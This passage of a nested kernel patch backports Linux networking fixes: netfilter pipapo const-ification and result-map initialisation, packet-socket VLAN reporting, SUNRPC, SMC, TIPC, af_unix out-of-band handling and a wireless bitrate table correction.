+@@ -360,7 +360,7 @@
+  * Return: -1 on no match, bit position on 'match_only', 0 otherwise.
+  */
+ int pipapo_refill(unsigned long *map, int len, int rules, unsigned long *dst,
+-		  union nft_pipapo_map_bucket *mt, bool match_only)
++		  const union nft_pipapo_map_bucket *mt, bool match_only)
+ {
+ 	unsigned long bitset;
+ 	int k, ret = -1;
+@@ -412,9 +412,9 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 	struct nft_pipapo_scratch *scratch;
+ 	unsigned long *res_map, *fill_map;
+ 	u8 genmask = nft_genmask_cur(net);
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	const u8 *rp = (const u8 *)key;
+-	struct nft_pipapo_match *m;
+-	struct nft_pipapo_field *f;
+ 	bool map_index;
+ 	int i;
+ 
+@@ -432,7 +432,7 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+ 	res_map  = scratch->map + (map_index ? m->bsize_max : 0);
+ 	fill_map = scratch->map + (map_index ? 0 : m->bsize_max);
+ 
+-	memset(res_map, 0xff, m->bsize_max * sizeof(*res_map));
++	pipapo_resmap_init(m, res_map);
+ 
+ 	nft_pipapo_for_each_field(f, i, m) {
+ 		bool last = i == m->field_count - 1;
+@@ -519,11 +519,13 @@ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ {
+ 	struct nft_pipapo_elem *ret = ERR_PTR(-ENOENT);
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+-	struct nft_pipapo_match *m = priv->clone;
+ 	unsigned long *res_map, *fill_map = NULL;
+-	struct nft_pipapo_field *f;
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	int i;
+ 
++	m = priv->clone;
++
+ 	res_map = kmalloc_array(m->bsize_max, sizeof(*res_map), GFP_ATOMIC);
+ 	if (!res_map) {
+ 		ret = ERR_PTR(-ENOMEM);
+@@ -536,7 +538,7 @@ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ 		goto out;
+ 	}
+ 
+-	memset(res_map, 0xff, m->bsize_max * sizeof(*res_map));
++	pipapo_resmap_init(m, res_map);
+ 
+ 	nft_pipapo_for_each_field(f, i, m) {
+ 		bool last = i == m->field_count - 1;
+@@ -1595,7 +1597,7 @@ static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ 
+ 	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
+ 		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
+-		struct nft_pipapo_field *f;
++		const struct nft_pipapo_field *f;
+ 		int i, start, rules_fx;
+ 
+ 		start = first_rule;
+@@ -2041,8 +2043,8 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct net *net = read_pnet(&set->net);
+-	struct nft_pipapo_match *m;
+-	struct nft_pipapo_field *f;
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	int i, r;
+ 
+ 	rcu_read_lock();
+diff --git a/net/netfilter/nft_set_pipapo.h b/net/netfilter/nft_set_pipapo.h
+index 30a3d092cd841..519a2e6dc206f 100644
+--- a/net/netfilter/nft_set_pipapo.h
++++ b/net/netfilter/nft_set_pipapo.h
+@@ -185,7 +185,7 @@ struct nft_pipapo_elem {
+ };
+ 
+ int pipapo_refill(unsigned long *map, int len, int rules, unsigned long *dst,
+-		  union nft_pipapo_map_bucket *mt, bool match_only);
++		  const union nft_pipapo_map_bucket *mt, bool match_only);
+ 
+ /**
+  * pipapo_and_field_buckets_4bit() - Intersect 4-bit buckets
+@@ -193,7 +193,7 @@ int pipapo_refill(unsigned long *map, int len, int rules, unsigned long *dst,
+  * @dst:	Area to store result
+  * @data:	Input data selecting table buckets
+  */
+-static inline void pipapo_and_field_buckets_4bit(struct nft_pipapo_field *f,
++static inline void pipapo_and_field_buckets_4bit(const struct nft_pipapo_field *f,
+ 						 unsigned long *dst,
+ 						 const u8 *data)
+ {
+@@ -221,7 +221,7 @@ static inline void pipapo_and_field_buckets_4bit(struct nft_pipapo_field *f,
+  * @dst:	Area to store result
+  * @data:	Input data selecting table buckets
+  */
+-static inline void pipapo_and_field_buckets_8bit(struct nft_pipapo_field *f,
++static inline void pipapo_and_field_buckets_8bit(const struct nft_pipapo_field *f,
+ 						 unsigned long *dst,
+ 						 const u8 *data)
+ {
+@@ -285,4 +285,25 @@ static u64 pipapo_estimate_size(const struct nft_set_desc *desc)
+ 	return size;
+ }
+ 
++/**
++ * pipapo_resmap_init() - Initialise result map before first use
++ * @m:		Matching data, including mapping table
++ * @res_map:	Result map
++ *
++ * Initialize all bits covered by the first field to one, so that after
++ * the first step, only the matching bits of the first bit group remain.
++ *
++ * If other fields have a large bitmap, set remainder of res_map to 0.
++ */
++static inline void pipapo_resmap_init(const struct nft_pipapo_match *m, unsigned long *res_map)
++{
++	const struct nft_pipapo_field *f = m->f;
++	int i;
++
++	for (i = 0; i < f->bsize; i++)
++		res_map[i] = ULONG_MAX;
++
++	for (i = f->bsize; i < m->bsize_max; i++)
++		res_map[i] = 0ul;
++}
+ #endif /* _NFT_SET_PIPAPO_H */
+diff --git a/net/netfilter/nft_set_pipapo_avx2.c b/net/netfilter/nft_set_pipapo_avx2.c
+index a3a8ddca99189..b8d3c3213efee 100644
+--- a/net/netfilter/nft_set_pipapo_avx2.c
++++ b/net/netfilter/nft_set_pipapo_avx2.c
+@@ -212,8 +212,9 @@ static int nft_pipapo_avx2_refill(int offset, unsigned long *map,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_2(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	u8 pg[2] = { pkt[0] >> 4, pkt[0] & 0xf };
+@@ -274,8 +275,9 @@ static int nft_pipapo_avx2_lookup_4b_2(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_4(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	u8 pg[4] = { pkt[0] >> 4, pkt[0] & 0xf, pkt[1] >> 4, pkt[1] & 0xf };
+@@ -350,8 +352,9 @@ static int nft_pipapo_avx2_lookup_4b_4(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_8(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	u8 pg[8] = {  pkt[0] >> 4,  pkt[0] & 0xf,  pkt[1] >> 4,  pkt[1] & 0xf,
+ 		      pkt[2] >> 4,  pkt[2] & 0xf,  pkt[3] >> 4,  pkt[3] & 0xf,
+@@ -445,8 +448,9 @@ static int nft_pipapo_avx2_lookup_4b_8(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_12(unsigned long *map, unsigned long *fill,
+-				        struct nft_pipapo_field *f, int offset,
+-				        const u8 *pkt, bool first, bool last)
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	u8 pg[12] = {  pkt[0] >> 4,  pkt[0] & 0xf,  pkt[1] >> 4,  pkt[1] & 0xf,
+ 		       pkt[2] >> 4,  pkt[2] & 0xf,  pkt[3] >> 4,  pkt[3] & 0xf,
+@@ -534,8 +538,9 @@ static int nft_pipapo_avx2_lookup_4b_12(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_4b_32(unsigned long *map, unsigned long *fill,
+-					struct nft_pipapo_field *f, int offset,
+-					const u8 *pkt, bool first, bool last)
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	u8 pg[32] = {  pkt[0] >> 4,  pkt[0] & 0xf,  pkt[1] >> 4,  pkt[1] & 0xf,
+ 		       pkt[2] >> 4,  pkt[2] & 0xf,  pkt[3] >> 4,  pkt[3] & 0xf,
+@@ -669,8 +674,9 @@ static int nft_pipapo_avx2_lookup_4b_32(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_1(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -726,8 +732,9 @@ static int nft_pipapo_avx2_lookup_8b_1(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_2(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -790,8 +797,9 @@ static int nft_pipapo_avx2_lookup_8b_2(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_4(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -865,8 +873,9 @@ static int nft_pipapo_avx2_lookup_8b_4(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_6(unsigned long *map, unsigned long *fill,
+-				       struct nft_pipapo_field *f, int offset,
+-				       const u8 *pkt, bool first, bool last)
++				       const struct nft_pipapo_field *f,
++				       int offset, const u8 *pkt,
++				       bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -950,8 +959,9 @@ static int nft_pipapo_avx2_lookup_8b_6(unsigned long *map, unsigned long *fill,
+  * word index to be checked next (i.e. first filled word).
+  */
+ static int nft_pipapo_avx2_lookup_8b_16(unsigned long *map, unsigned long *fill,
+-					struct nft_pipapo_field *f, int offset,
+-					const u8 *pkt, bool first, bool last)
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	int i, ret = -1, m256_size = f->bsize / NFT_PIPAPO_LONGS_PER_M256, b;
+ 	unsigned long *lt = f->lt, bsize = f->bsize;
+@@ -1026,6 +1036,7 @@ static int nft_pipapo_avx2_lookup_8b_16(unsigned long *map, unsigned long *fill,
+ 
+ /**
+  * nft_pipapo_avx2_lookup_slow() - Fallback function for uncommon field sizes
++ * @mdata:	Matching data, including mapping table
+  * @map:	Previous match result, used as initial bitmap
+  * @fill:	Destination bitmap to be filled with current match result
+  * @f:		Field, containing lookup and mapping tables
+@@ -1041,15 +1052,17 @@ static int nft_pipapo_avx2_lookup_8b_16(unsigned long *map, unsigned long *fill,
+  * Return: -1 on no match, rule index of match if @last, otherwise first long
+  * word index to be checked next (i.e. first filled word).
+  */
+-static int nft_pipapo_avx2_lookup_slow(unsigned long *map, unsigned long *fill,
+-					struct nft_pipapo_field *f, int offset,
+-					const u8 *pkt, bool first, bool last)
++static int nft_pipapo_avx2_lookup_slow(const struct nft_pipapo_match *mdata,
++					unsigned long *map, unsigned long *fill,
++					const struct nft_pipapo_field *f,
++					int offset, const u8 *pkt,
++					bool first, bool last)
+ {
+ 	unsigned long bsize = f->bsize;
+ 	int i, ret = -1, b;
+ 
+ 	if (first)
+-		memset(map, 0xff, bsize * sizeof(*map));
++		pipapo_resmap_init(mdata, map);
+ 
+ 	for (i = offset; i < bsize; i++) {
+ 		if (f->bb == 8)
+@@ -1119,15 +1132,21 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_scratch *scratch;
+ 	u8 genmask = nft_genmask_cur(net);
++	const struct nft_pipapo_match *m;
++	const struct nft_pipapo_field *f;
+ 	const u8 *rp = (const u8 *)key;
+-	struct nft_pipapo_match *m;
+-	struct nft_pipapo_field *f;
+ 	unsigned long *res, *fill;
+ 	bool map_index;
+ 	int i, ret = 0;
+ 
+-	if (unlikely(!irq_fpu_usable()))
+-		return nft_pipapo_lookup(net, set, key, ext);
++	local_bh_disable();
++
++	if (unlikely(!irq_fpu_usable())) {
++		bool fallback_res = nft_pipapo_lookup(net, set, key, ext);
++
++		local_bh_enable();
++		return fallback_res;
++	}
+ 
+ 	m = rcu_dereference(priv->match);
+ 
+@@ -1142,6 +1161,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	scratch = *raw_cpu_ptr(m->scratch);
+ 	if (unlikely(!scratch)) {
+ 		kernel_fpu_end();
++		local_bh_enable();
+ 		return false;
+ 	}
+ 
+@@ -1175,7 +1195,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 			} else if (f->groups == 16) {
+ 				NFT_SET_PIPAPO_AVX2_LOOKUP(8, 16);
+ 			} else {
+-				ret = nft_pipapo_avx2_lookup_slow(res, fill, f,
++				ret = nft_pipapo_avx2_lookup_slow(m, res, fill, f,
+ 								  ret, rp,
+ 								  first, last);
+ 			}
+@@ -1191,7 +1211,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 			} else if (f->groups == 32) {
+ 				NFT_SET_PIPAPO_AVX2_LOOKUP(4, 32);
+ 			} else {
+-				ret = nft_pipapo_avx2_lookup_slow(res, fill, f,
++				ret = nft_pipapo_avx2_lookup_slow(m, res, fill, f,
+ 								  ret, rp,
+ 								  first, last);
+ 			}
+@@ -1222,6 +1242,7 @@ bool nft_pipapo_avx2_lookup(const struct net *net, const struct nft_set *set,
+ 	if (i % 2)
+ 		scratch->map_index = !map_index;
+ 	kernel_fpu_end();
++	local_bh_enable();
+ 
+ 	return ret >= 0;
+ }
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index c48cb7664c552..c9c813f731c6e 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -541,6 +541,61 @@ static void *packet_current_frame(struct packet_sock *po,
+ 	return packet_lookup_frame(po, rb, rb->head, status);
+ }
+ 
++static u16 vlan_get_tci(struct sk_buff *skb, struct net_device *dev)
++{
++	u8 *skb_orig_data = skb->data;
++	int skb_orig_len = skb->len;
++	struct vlan_hdr vhdr, *vh;
++	unsigned int header_len;
++
++	if (!dev)
++		return 0;
++
++	/* In the SOCK_DGRAM scenario, skb data starts at the network
++	 * protocol, which is after the VLAN headers. The outer VLAN
++	 * header is at the hard_header_len offset in non-variable
++	 * length link layer headers. If it's a VLAN device, the
++	 * min_header_len should be used to exclude the VLAN header
++	 * size.
++	 */
++	if (dev->min_header_len == dev->hard_header_len)
++		header_len = dev->hard_header_len;
++	else if (is_vlan_dev(dev))
++		header_len = dev->min_header_len;
++	else
++		return 0;
++
++	skb_push(skb, skb->data - skb_mac_header(skb));
++	vh = skb_header_pointer(skb, header_len, sizeof(vhdr), &vhdr);
++	if (skb_orig_data != skb->data) {
++		skb->data = skb_orig_data;
++		skb->len = skb_orig_len;
++	}
++	if (unlikely(!vh))
++		return 0;
++
++	return ntohs(vh->h_vlan_TCI);
++}
++
++static __be16 vlan_get_protocol_dgram(struct sk_buff *skb)
++{
++	__be16 proto = skb->protocol;
++
++	if (unlikely(eth_type_vlan(proto))) {
++		u8 *skb_orig_data = skb->data;
++		int skb_orig_len = skb->len;
++
++		skb_push(skb, skb->data - skb_mac_header(skb));
++		proto = __vlan_get_protocol(skb, proto, NULL);
++		if (skb_orig_data != skb->data) {
++			skb->data = skb_orig_data;
++			skb->len = skb_orig_len;
++		}
++	}
++
++	return proto;
++}
++
+ static void prb_del_retire_blk_timer(struct tpacket_kbdq_core *pkc)
+ {
+ 	del_timer_sync(&pkc->retire_blk_timer);
+@@ -1010,10 +1065,16 @@ static void prb_clear_rxhash(struct tpacket_kbdq_core *pkc,
+ static void prb_fill_vlan_info(struct tpacket_kbdq_core *pkc,
+ 			struct tpacket3_hdr *ppd)
+ {
++	struct packet_sock *po = container_of(pkc, struct packet_sock, rx_ring.prb_bdqc);
++
+ 	if (skb_vlan_tag_present(pkc->skb)) {
+ 		ppd->hv1.tp_vlan_tci = skb_vlan_tag_get(pkc->skb);
+ 		ppd->hv1.tp_vlan_tpid = ntohs(pkc->skb->vlan_proto);
+ 		ppd->tp_status = TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++	} else if (unlikely(po->sk.sk_type == SOCK_DGRAM && eth_type_vlan(pkc->skb->protocol))) {
++		ppd->hv1.tp_vlan_tci = vlan_get_tci(pkc->skb, pkc->skb->dev);
++		ppd->hv1.tp_vlan_tpid = ntohs(pkc->skb->protocol);
++		ppd->tp_status = TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
+ 	} else {
+ 		ppd->hv1.tp_vlan_tci = 0;
+ 		ppd->hv1.tp_vlan_tpid = 0;
+@@ -2431,6 +2492,10 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 			h.h2->tp_vlan_tci = skb_vlan_tag_get(skb);
+ 			h.h2->tp_vlan_tpid = ntohs(skb->vlan_proto);
+ 			status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++		} else if (unlikely(sk->sk_type == SOCK_DGRAM && eth_type_vlan(skb->protocol))) {
++			h.h2->tp_vlan_tci = vlan_get_tci(skb, skb->dev);
++			h.h2->tp_vlan_tpid = ntohs(skb->protocol);
++			status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
+ 		} else {
+ 			h.h2->tp_vlan_tci = 0;
+ 			h.h2->tp_vlan_tpid = 0;
+@@ -2460,7 +2525,8 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll->sll_halen = dev_parse_header(skb, sll->sll_addr);
+ 	sll->sll_family = AF_PACKET;
+ 	sll->sll_hatype = dev->type;
+-	sll->sll_protocol = skb->protocol;
++	sll->sll_protocol = (sk->sk_type == SOCK_DGRAM) ?
++		vlan_get_protocol_dgram(skb) : skb->protocol;
+ 	sll->sll_pkttype = skb->pkt_type;
+ 	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+@@ -3481,7 +3547,8 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		/* Original length was stored in sockaddr_ll fields */
+ 		origlen = PACKET_SKB_CB(skb)->sa.origlen;
+ 		sll->sll_family = AF_PACKET;
+-		sll->sll_protocol = skb->protocol;
++		sll->sll_protocol = (sock->type == SOCK_DGRAM) ?
++			vlan_get_protocol_dgram(skb) : skb->protocol;
+ 	}
+ 
+ 	sock_recv_cmsgs(msg, sk, skb);
+@@ -3536,6 +3603,21 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 			aux.tp_vlan_tci = skb_vlan_tag_get(skb);
+ 			aux.tp_vlan_tpid = ntohs(skb->vlan_proto);
+ 			aux.tp_status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++		} else if (unlikely(sock->type == SOCK_DGRAM && eth_type_vlan(skb->protocol))) {
++			struct sockaddr_ll *sll = &PACKET_SKB_CB(skb)->sa.ll;
++			struct net_device *dev;
++
++			rcu_read_lock();
++			dev = dev_get_by_index_rcu(sock_net(sk), sll->sll_ifindex);
++			if (dev) {
++				aux.tp_vlan_tci = vlan_get_tci(skb, dev);
++				aux.tp_vlan_tpid = ntohs(skb->protocol);
++				aux.tp_status |= TP_STATUS_VLAN_VALID | TP_STATUS_VLAN_TPID_VALID;
++			} else {
++				aux.tp_vlan_tci = 0;
++				aux.tp_vlan_tpid = 0;
++			}
++			rcu_read_unlock();
+ 		} else {
+ 			aux.tp_vlan_tci = 0;
+ 			aux.tp_vlan_tpid = 0;
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index 64b6dd439938e..10d79cb55528d 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1959,7 +1959,6 @@ int smc_conn_create(struct smc_sock *smc, struct smc_init_info *ini)
+  */
+ static u8 smc_compress_bufsize(int size, bool is_smcd, bool is_rmb)
+ {
+-	const unsigned int max_scat = SG_MAX_SINGLE_ALLOC * PAGE_SIZE;
+ 	u8 compressed;
+ 
+ 	if (size <= SMC_BUF_MIN_SIZE)
+@@ -1969,9 +1968,11 @@ static u8 smc_compress_bufsize(int size, bool is_smcd, bool is_rmb)
+ 	compressed = min_t(u8, ilog2(size) + 1,
+ 			   is_smcd ? SMCD_DMBE_SIZES : SMCR_RMBE_SIZES);
+ 
++#ifdef CONFIG_ARCH_NO_SG_CHAIN
+ 	if (!is_smcd && is_rmb)
+ 		/* RMBs are backed by & limited to max size of scatterlists */
+-		compressed = min_t(u8, compressed, ilog2(max_scat >> 14));
++		compressed = min_t(u8, compressed, ilog2((SG_MAX_SINGLE_ALLOC * PAGE_SIZE) >> 14));
++#endif
+ 
+ 	return compressed;
+ }
+diff --git a/net/sunrpc/auth_gss/gss_krb5_keys.c b/net/sunrpc/auth_gss/gss_krb5_keys.c
+index 726c076950c04..fc4639687c0fd 100644
+--- a/net/sunrpc/auth_gss/gss_krb5_keys.c
++++ b/net/sunrpc/auth_gss/gss_krb5_keys.c
+@@ -161,7 +161,7 @@ u32 krb5_derive_key(const struct gss_krb5_enctype *gk5e,
+ 	if (IS_ERR(cipher))
+ 		goto err_return;
+ 	if (crypto_sync_skcipher_setkey(cipher, inkey->data, inkey->len))
+-		goto err_return;
++		goto err_free_cipher;
+ 
+ 	/* allocate and set up buffers */
+ 
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index 1dbad41c46145..b6529a9d37d37 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2296,12 +2296,13 @@ call_transmit_status(struct rpc_task *task)
+ 		task->tk_action = call_transmit;
+ 		task->tk_status = 0;
+ 		break;
+-	case -ECONNREFUSED:
+ 	case -EHOSTDOWN:
+ 	case -ENETDOWN:
+ 	case -EHOSTUNREACH:
+ 	case -ENETUNREACH:
+ 	case -EPERM:
++		break;
++	case -ECONNREFUSED:
+ 		if (RPC_IS_SOFTCONN(task)) {
+ 			if (!task->tk_msg.rpc_proc->p_proc)
+ 				trace_xprt_ping(task->tk_xprt,
+diff --git a/net/sunrpc/xprtrdma/frwr_ops.c b/net/sunrpc/xprtrdma/frwr_ops.c
+index ffbf99894970e..47f33bb7bff81 100644
+--- a/net/sunrpc/xprtrdma/frwr_ops.c
++++ b/net/sunrpc/xprtrdma/frwr_ops.c
+@@ -92,7 +92,8 @@ static void frwr_mr_put(struct rpcrdma_mr *mr)
+ 	rpcrdma_mr_push(mr, &mr->mr_req->rl_free_mrs);
+ }
+ 
+-/* frwr_reset - Place MRs back on the free list
++/**
++ * frwr_reset - Place MRs back on @req's free list
+  * @req: request to reset
+  *
+  * Used after a failed marshal. For FRWR, this means the MRs
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index 4f71627ba39ce..cb909329a5039 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -897,6 +897,8 @@ static int rpcrdma_reqs_setup(struct rpcrdma_xprt *r_xprt)
+ 
+ static void rpcrdma_req_reset(struct rpcrdma_req *req)
+ {
++	struct rpcrdma_mr *mr;
++
+ 	/* Credits are valid for only one connection */
+ 	req->rl_slot.rq_cong = 0;
+ 
+@@ -906,7 +908,19 @@ static void rpcrdma_req_reset(struct rpcrdma_req *req)
+ 	rpcrdma_regbuf_dma_unmap(req->rl_sendbuf);
+ 	rpcrdma_regbuf_dma_unmap(req->rl_recvbuf);
+ 
+-	frwr_reset(req);
++	/* The verbs consumer can't know the state of an MR on the
++	 * req->rl_registered list unless a successful completion
++	 * has occurred, so they cannot be re-used.
++	 */
++	while ((mr = rpcrdma_mr_pop(&req->rl_registered))) {
++		struct rpcrdma_buffer *buf = &mr->mr_xprt->rx_buf;
++
++		spin_lock(&buf->rb_lock);
++		list_del(&mr->mr_all);
++		spin_unlock(&buf->rb_lock);
++
++		frwr_mr_release(mr);
++	}
+ }
+ 
+ /* ASSUMPTION: the rb_allreqs list is stable for the duration,
+diff --git a/net/tipc/udp_media.c b/net/tipc/udp_media.c
+index 0a85244fd6188..73e461dc12d7b 100644
+--- a/net/tipc/udp_media.c
++++ b/net/tipc/udp_media.c
+@@ -135,8 +135,11 @@ static int tipc_udp_addr2str(struct tipc_media_addr *a, char *buf, int size)
+ 		snprintf(buf, size, "%pI4:%u", &ua->ipv4, ntohs(ua->port));
+ 	else if (ntohs(ua->proto) == ETH_P_IPV6)
+ 		snprintf(buf, size, "%pI6:%u", &ua->ipv6, ntohs(ua->port));
+-	else
++	else {
+ 		pr_err("Invalid UDP media address\n");
++		return 1;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 3905cdcaa5184..db71f35b67b86 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2710,10 +2710,49 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 
+ static int unix_stream_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
++	struct unix_sock *u = unix_sk(sk);
++	struct sk_buff *skb;
++	int err;
++
+ 	if (unlikely(READ_ONCE(sk->sk_state) != TCP_ESTABLISHED))
+ 		return -ENOTCONN;
+ 
+-	return unix_read_skb(sk, recv_actor);
++	mutex_lock(&u->iolock);
++	skb = skb_recv_datagram(sk, MSG_DONTWAIT, &err);
++	mutex_unlock(&u->iolock);
++	if (!skb)
++		return err;
++
++#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
++	if (unlikely(skb == READ_ONCE(u->oob_skb))) {
++		bool drop = false;
++
++		unix_state_lock(sk);
++
++		if (sock_flag(sk, SOCK_DEAD)) {
++			unix_state_unlock(sk);
++			kfree_skb(skb);
++			return -ECONNRESET;
++		}
++
++		spin_lock(&sk->sk_receive_queue.lock);
++		if (likely(skb == u->oob_skb)) {
++			WRITE_ONCE(u->oob_skb, NULL);
++			drop = true;
++		}
++		spin_unlock(&sk->sk_receive_queue.lock);
++
++		unix_state_unlock(sk);
++
++		if (drop) {
++			WARN_ON_ONCE(skb_unref(skb));
++			kfree_skb(skb);
++			return -EAGAIN;
++		}
++	}
++#endif
++
++	return recv_actor(sk, skb);
+ }
+ 
+ static int unix_stream_read_generic(struct unix_stream_read_state *state,
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index bd84785bf8d6c..bca2d86ba97d8 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -54,6 +54,9 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
+ 	struct sk_psock *psock;
+ 	int copied;
+ 
++	if (flags & MSG_OOB)
++		return -EOPNOTSUPP;
++
+ 	if (!len)
+ 		return 0;
+ 
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index 73b3648e1b4c3..1665320d22146 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -1373,7 +1373,7 @@ static u32 cfg80211_calculate_bitrate_he(struct rate_info *rate)
+ 		  5120, /*  0.833333... */
+ 	};
+ 	u32 rates_160M[3] = { 960777777, 907400000, 816666666 };
+-	u32 rates_969[3] =  { 480388888, 453700000, 408333333 };
++	u32 rates_996[3] =  { 480388888, 453700000, 408333333 };
+ 	u32 rates_484[3] =  { 229411111, 216666666, 195000000 };
+ 	u32 rates_242[3] =  { 114711111, 108333333,  97500000 };
+ 	u32 rates_106[3] =  {  40000000,  37777777,  34000000 };
+@@ -1393,12 +1393,14 @@ static u32 cfg80211_calculate_bitrate_he(struct rate_info *rate)
+ 	if (WARN_ON_ONCE(rate->nss < 1 || rate->nss > 8))
+ 		return 0;
+ 
+-	if (rate->bw == RATE_INFO_BW_160)
++	if (rate->bw == RATE_INFO_BW_160 ||
++	    (rate->bw == RATE_INFO_BW_HE_RU &&
++	     rate->he_ru_alloc == NL80211_RATE_INFO_HE_RU_ALLOC_2x996))
